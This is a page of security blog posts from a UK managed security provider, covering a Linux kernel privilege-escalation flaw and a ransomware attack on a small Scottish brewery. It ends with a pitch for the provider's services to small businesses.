Right on the back of last weeks round-up Linux is in the headlines again with a second Kernel based flaw in a week.This latest vulnerability CVE-2018-17182, was discovered by Jann Horn a researcher at Google Project Zero, and affects the Linux Memory Management in Kernel versions 3.16 to 4.18.8.Horn explains that this results from an overflow in the VMA memory cache, which can be exploited in a number of different ways, opening the door to privilege escalation, root access and arbitrary code execution.As this affects numerous Linux distros, including Red Hat, Debian, Ubuntu and Android it is recommended that you review your current OS and patch accordingly.Threatposts coverage of this vuln can be found here: https://threatpost.com/another-linux-kernel-bug-surfaces-allowing-root-access/137800/It been a huge week for news in Cyber Security, with some big pieces that I am sure will roll on for some time, please do tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #11 – 5th October 2018
By
Stuart Hare
on
5/10/18
Data breaches that compromise hundreds of thousands (or even millions) of records tend to grab the most headlines, and we only get to hear about them when the large organisations admit their failures (which is not always the case).The true scale of the problem is not really known as breaches can often be 'swept under the carpet' - it’s not great for business to acknowledge you've had inadequately protected systems.Just in the last couple of months we’ve seen several major breaches in the UK alone, with household brands such as T-Mobile , Superdrug,Butlins and British Airways getting hacked.Just try googling “security breaches” and you will be inundated with news stories globally of companies being attacked. Just recently we even heard that Facebook had been infiltrated.
Don’t be fooled by the big names though, as Small and medium-sized businesses (SMBs) are far from immune to cyberattacks. Just last month we saw that being a small business situated just off the West coast of Scotland on the Isle of Arran does not matter in the world of cybercrime.The Arran Brewery were recruiting for new employees and suddenly had lots of interest after the advertisement was posted on an international jobs site.They started getting several emails a day, all with attached CVs, and in amongst the genuine job seekers there was a virus embedded within a CV. When it was opened by a staff member, the virus took effect, and the software started to encrypt their systems and backups.The brewery faced a ransom demand where they had to pay up for a key to decrypt the files or face losing their data. They brought in cyber security specialists who removed the virus and restored some of the system, but not all. They appear to have lost a lot of data.
It was interesting to note that their Anti-Virus (AV) protection software did not pick up the attack.This is a common problem as traditional AV solutions rely on updates to be created and pushed out to machines, sometimes with the aid of the users themselves. It can also take the AV software companies quite some time to detect a threat in the wider world (known as the “Time To Detection” or “TTD”) after which they can address the problem and get critical updates out to customers.Faster time to detection is critical to minimise damage from intrusions, and one of the reasons we are Cisco partners is because they have successfully lowered their TTD to as low as nine hours (compared to the average of 100 days). That’s quite a difference.
Cisco’s “Small and Mighty” is a special report that indicates 53% of midmarket (or medium sized) businesses have experienced a security breach, which should be an alarming figure for anyone responsible for IT within a small or medium sized business.
40% of those who were breached had over 8 hours of downtime.
You can see the full report here, it’s an interesting read.
The larger enterprises invest fortunes and recruit security teams to handle cybersecurity, so it’s no surprise that cybercriminals may find it easier to take the path of least resistance and target the small and medium sized businesses.If you think your business is too small to be targeted by a hacker then you should think again. If your business handles any financial information or valuable data about your customers, then you’re a target for cyberattacks.
One very simple recommendation is to frequently back up your data, not just once, but multiple times. If you’re outsourcing your IT to a third party, make sure they are doing at least two or three backups in different places, as data loss can be devastating and literally bring a business to the brink of closure.Whilst some small businesses don’t see the need to spend on cybersecurity, it’s not the place for SMBs to cut costs. If you don’t take cybersecurity seriously, and one day you’re forced to pay £10,000 in bitcoin to — hopefully — unlock your data, you’ll regret that approach.That’s where we come in. At Ironshare we realise that budgets are tight, so we provide security services at an affordable and realistic price.
Your own IT staff or support company will no doubt provide the basics — such as routine system monitoring, software upgrades, training on new systems and services, help desk support, and other things – but they may not have any specialist security knowledge.It’s hard for a standard business or IT provider to find and retain staff, and problems can start if you don’t have people dedicated to security on a daily basis.
Ironshare are an MSSP (Managed Security Service Provider) and our fully qualified team can enable small businesses to outsource their cyber security protections for a flexible monthly or annual fee.We’ll help you to assess your people, process, technology and practices and put together a plan that will see immediate benefits. Our services are backed by industry leading Cisco solutions that are reliable, well-implemented tools and technologies.If you’d like a “proof-of-concept” period before signing up, then we can arrange a free trial to showcase our services. Simply enter your details on our Contact page.Ironshare – Security, Simplified.
By
James Phipps
on
3/10/18
No results found.
